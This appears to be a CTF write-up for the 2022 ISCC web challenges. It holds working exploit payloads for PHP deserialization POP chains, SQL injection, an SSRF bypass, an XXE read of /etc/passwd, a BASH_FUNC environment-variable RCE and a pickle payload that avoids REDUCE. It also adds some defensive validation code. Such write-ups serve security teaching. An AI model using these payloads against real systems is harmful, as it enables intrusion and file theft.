2022ISCC-web
Everything except 爱国敬业好青年1 (which had zero solves) is written up. The writeup is fairly brief; questions are welcome.
冬奥会 (Winter Olympics)
Pass in a JSON string whose first key is year with a value that is not a number.
if(is_array(@$info["items"])){
    if(!is_array($info["items"][1]) OR count($info["items"])!==3 ) die("Sorry~");
    $status = array_search("skiing", $info["items"]);   // loose (==) comparison
    $status===false?die("Sorry~"):NULL;
    foreach($info["items"] as $key=>$val){
        $val==="skiing"?die("Sorry~"):NULL;              // strict (===) comparison
    }
    $Step2=True;
}
The second key is items. array_search() compares with loose ==, and under PHP 7 the integer 0 compares equal to the non-numeric string "skiing", so 0 satisfies the search while the strict === check in the foreach never fires. items[1] must itself be an array and there must be exactly three elements, hence the nested array.
poc
?Information={"year":"a","items":[0,[],"a"]}
爱国敬业好青年2
May 10 is the 100th anniversary of the founding of the Communist Youth League, so the coordinates are presumably Tiananmen. Go to the /flag page and POST the latitude and longitude to get the flag.
POST body:
lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N
Pop2022
The target is include(). A PHP stream wrapper (php://filter) can be used to read and output the file.
poc:
<?php
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        //echo 'Road_is_Long__construct';
        $this->page = $file;
    }
    public function __toString(){
        echo '__toString';
        return $this->string->page;   // $string is a Make_a_Change, so this goes through __get()
    }
    public function __wakeup(){
        // $page is an object here; preg_match() needs a string, so PHP calls $page->__toString()
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    // the filter URL lives in a class that has no __wakeup check at all
    protected $var='php://filter/read=convert.base64-encode/resource=/flag.php';
    public function append($value){
        echo 'append';
        include($value);
    }
    public function __invoke(){
        echo '__invoke';
        $this->append($this->var);
    }
}
class Make_a_Change{
    public $effort;
    public function __construct(){
        //echo 'Make_a_Change__construct';
        $this->effort = array();
    }
    public function __get($key){
        echo '__get';
        $function = $this->effort;
        return $function();           // $effort is a Try_Work_Hard, so this calls __invoke()
    }
}
// chain: unserialize -> $a->__wakeup -> preg_match stringifies $b -> $b->__toString
//        -> $c->__get -> $d->__invoke -> include(php://filter...)
$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard();
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a));
?>
ISCC{lets_pop_your_2022}
Easy-SQL
?id=-8 union table emails limit 7,1#
This dumps the source.
When the row the query looks for does not exist, the values supplied by the UNION become the returned row, so the login record can be fabricated (0x61646d696e is the hex encoding of admin):
username=0' union select 1,0x61646d696e,3#&passwd=3
findme
A simple PHP native-class exploitation challenge.
http://59.110.159.206:8030/unser.php
First use the php://filter wrapper to read hint.php and learn roughly where the flag is:
<?php
class a{
    public $un0;
    public $un1;
    public $un2="php://filter/convert.base64-encode/resource=";
    public $un3;
    public $un4;
}
$payload=new a();
echo serialize($payload);
The following poc then gets the flag file directly:
<?php
class a{
    public $un0="DirectoryIterator";
    public $un1="glob:///var/www/html/f*.txt";
    public $un2;
    public $un3="unserialize";
    public $un4="abc";
}
$a=new a();
echo serialize($a);
让我康康! (Let me take a look!)
There is a search box and a hint telling us to visit the fl4g page. Visiting it returns a 403 page, so we try reaching fl4g through an HTTP request smuggling vulnerability; it then says the request must come from localhost.
Combined with the search box, we find that the request as rewritten by the front end is reflected in the response. The data has to be POSTed with a CT (Content-Type) field added; through the request smuggling vulnerability we obtain the header name the front-end server uses to pass the client's source IP, and can then pose as a local user.
Finally we get the flag.
This is a code-audit challenge.
Visit index and craft the request url=1 to get an error page; view its source.
Visiting that file reveals the source encoded as emoji.
Decoding it gives the source code:
import re
import socket
import struct
import base64
from urllib.parse import urlparse
from flask import render_template

# control_key and addr are set elsewhere in the challenge source (not shown in the writeup).

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"

def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match(r'https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        # the 'https?://@host' form never resolves the hostname; it goes to judge_ip instead
        if re.match(r'https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            # only the first resolved address is checked
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"

def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]

def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return (ip2long('127.0.0.0') >> 24 == ip >> 24
            or ip2long('10.0.0.0') >> 24 == ip >> 24
            or ip2long('172.16.0.0') >> 20 == ip >> 20
            or ip2long('192.168.0.0') >> 16 == ip >> 16
            or ip2long('0.0.0.0') >> 24 == ip >> 24)

def waf1(ip):
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False

def judge_ip(ip):
    if(waf1(ip)):
        return False    # the source as transcribed reads 'Fasle'
    else:
        addr_bytes = addr.encode(encoding = "utf-8")
        ipp = base64.encodebytes(addr_bytes)   # base64.encodestring in the original; removed in Python 3.9
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return False
Craft the request http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x
This bypasses the SSRF check and gives a new hint: the https://@... form takes the judge_ip branch, which never resolves the host, and the base64 hostname contains none of the characters waf1 forbids while, lowercased, it equals base64(addr).
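As an added example (not from the challenge or the writeup), here is how the outbound-URL check could be written so that the two weaknesses above, the https://@host branch that skips resolution and the first-address-only check, are closed. validate_outbound_url, resolve_all and is_internal are names chosen here; the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# validate_outbound_url / resolve_all / is_internal are names chosen for this example.

def resolve_all(hostname):
    """Return every address the name resolves to, not just getaddrinfo(...)[0]."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}

def is_internal(addr):
    """True for loopback, RFC1918, link-local (incl. 169.254.169.254), multicast, 0.0.0.0 and reserved."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_unspecified or ip.is_reserved)

def validate_outbound_url(url, resolver=resolve_all):
    """Return (ok, reason). Unlike check_ssrf there is no second code path that
    skips resolution: userinfo ('https://@host') is rejected outright, the host
    comes from urlsplit rather than a regex, and every resolved address must be
    public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if "@" in parts.netloc:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = resolver(host)
    except (OSError, ValueError) as e:
        return False, "resolution failed: %s" % e
    if not addrs:
        return False, "no address"
    for addr in addrs:
        if is_internal(addr):
            return False, "internal address %s" % addr
    return True, "ok"
```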
Visit that directory, intercept the request and change the cookie to the one the challenge gives.
This lands on a login page; right-click to view the source and find a block of JS.
Clearly we are meant to craft a POST request; there is an XXE vulnerability, so construct the following:
POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<user><name>&name;</name><password>admin</password></user>
The file is read successfully.
Per the hint, use the /proc feature: /proc/self/cwd/ gives the working directory of the target's current process and the files in it.
Reading /proc/self/cwd/flag.txt yields the flag.
ping2rce
Environment-variable RCE; see p牛's article https://tttang.com/archive/1450/. Crafting the poc directly gives command execution.
POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379
--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"
() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--
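As an added defensive example (not from the challenge or the article linked above): a CGI handler that runs ping should hand the child a fixed argv and an allowlisted environment, so a form field named BASH_FUNC_ping%% can never reach bash as an exported function definition. safe_cgi_env, ping_argv, is_valid_target and run_ping are names chosen here.

```python
import ipaddress
import re
import subprocess

# safe_cgi_env / ping_argv / is_valid_target / run_ping are names chosen for this example.
ALLOWED_ENV = ("LANG", "LC_ALL", "REQUEST_METHOD", "REMOTE_ADDR", "QUERY_STRING")
VAR_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
FIXED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

def safe_cgi_env(env):
    """Allowlist-copy the environment for the child process. Everything else is
    dropped, which covers request-derived names such as BASH_FUNC_ping%% (bash
    imports BASH_FUNC_<name>%% values beginning with '() {' as a function <name>,
    which would shadow the ping binary)."""
    clean = {}
    for key, value in env.items():
        if key not in ALLOWED_ENV or not VAR_NAME.match(key):
            continue
        if value.lstrip().startswith("() {"):   # never pass an exported function body through
            continue
        clean[key] = value
    clean["PATH"] = FIXED_PATH                  # fixed lookup path; do not trust the inherited one
    return clean

def is_valid_target(target):
    """Only a literal IP address is accepted as the ping target."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True

def ping_argv(target):
    """argv list with the validated target as one argument: no shell, no option injection."""
    if not is_valid_target(target):
        raise ValueError("target is not an IP address")
    return ["ping", "-c", "1", str(ipaddress.ip_address(target.strip()))]

def run_ping(target, env):
    return subprocess.run(ping_argv(target), env=safe_cgi_env(env),
                          capture_output=True, text=True, timeout=5)
```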
Melody
First log in as any user; a session is in use:
eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI
A hint says the /info page must be accessed with the Melody browser; change the User-Agent header to Melody.
There is Jinja2 template injection; view the config to find the session key, then forge the session directly.
Key obtained: meldoy-is-so-cute-wawawa!
Then forge the Flask session with a script; replace the session and the login succeeds.
The flag is fake; a .py source file turns up, download it.
The code:
# -*- coding:utf-8 -*-
import io
import sys
import pickle
import melody          # challenge-specific module holding the expected name/password
import base64
from flask import Flask, Response, request, session

app = Flask(__name__)  # app and the read() helper are defined elsewhere in the original file

class register:
    def __init__(self,name,password):
        self.name = name
        self.password = password
    def __eq__(self, other):
        return type(other) is register and self.name == other.name and self.password == other.password

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # prefix check: any global in __main__, including the imported melody module, is reachable
        if module[0:8] == '__main__':
            return getattr(sys.modules['__main__'],name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def find(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/therealflag', methods=['GET','POST'])
def realflag():
    if request.method == 'POST':
        try:
            data = request.form.get('melody')
            if b'R' in base64.b64decode(data):   # blocks the REDUCE opcode byte only
                return 'no reduce'
            else:
                result = find(base64.b64decode(data))
                if type(result) is not register:
                    return 'The type is not correct!'
                correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
                if correct:
                    if session['username'] == 'admin':
                        return Response(read('./flag.txt'))
                    else:
                        return Response("You're not admin!")
        except Exception as e:
            return Response(str(e))
    test = register('admin', '123456')
    data = base64.b64encode(pickle.dumps(test)).decode()
    return Response(data)
Pickle deserialization. Write the payload (pker can generate it): find_class lets any __main__ global through, so the pickle fetches the melody module, sets its name and password with the BUILD opcode (b), then constructs register("melody","hug") with the OBJ opcode (o), none of which is the blocked R:
import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))
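As an added example (not from the challenge), this is how find_class can be written so that the two weaknesses the payload above relies on are closed: the '__main__' prefix check that exposes every module-level global such as the melody module, and the opcode-byte denylist that blocks REDUCE (R) but not BUILD (b) or OBJ (o). AllowlistUnpickler, loads_allowlisted and rejects are names chosen here, and the sample pickles are constructed inline.

```python
import io
import pickle

# AllowlistUnpickler / loads_allowlisted / rejects are names chosen for this example.

class register:
    def __init__(self, name, password):
        self.name = name
        self.password = password
    def __eq__(self, other):
        return (type(other) is register and self.name == other.name
                and self.password == other.password)

class Other:
    """Some other class in the same module; not on the allowlist."""

class AllowlistUnpickler(pickle.Unpickler):
    """Resolve globals only to exact (module, name) pairs of the classes in
    ALLOWED. Module-level objects such as an imported config module are not in
    the list, so a BUILD opcode has nothing to overwrite, and REDUCE/OBJ/NEWOBJ
    can only ever call the allowed constructor."""
    ALLOWED = (register,)

    def find_class(self, module, name):
        for cls in self.ALLOWED:
            if module == cls.__module__ and name == cls.__name__:
                return cls
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def loads_allowlisted(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()

def rejects(data):
    """True if the allowlisted loader refuses the pickle."""
    try:
        loads_allowlisted(data)
    except pickle.UnpicklingError:
        return True
    return False

# constructed inputs: a legitimate register pickle, a pickle naming a module-level
# global (GLOBAL '__main__.melody' then STOP), and a pickle of a non-allowed class
LEGIT = pickle.dumps(register("melody", "hug"))
MODULE_GLOBAL = b"c__main__\nmelody\n."
OTHER = pickle.dumps(Other())
```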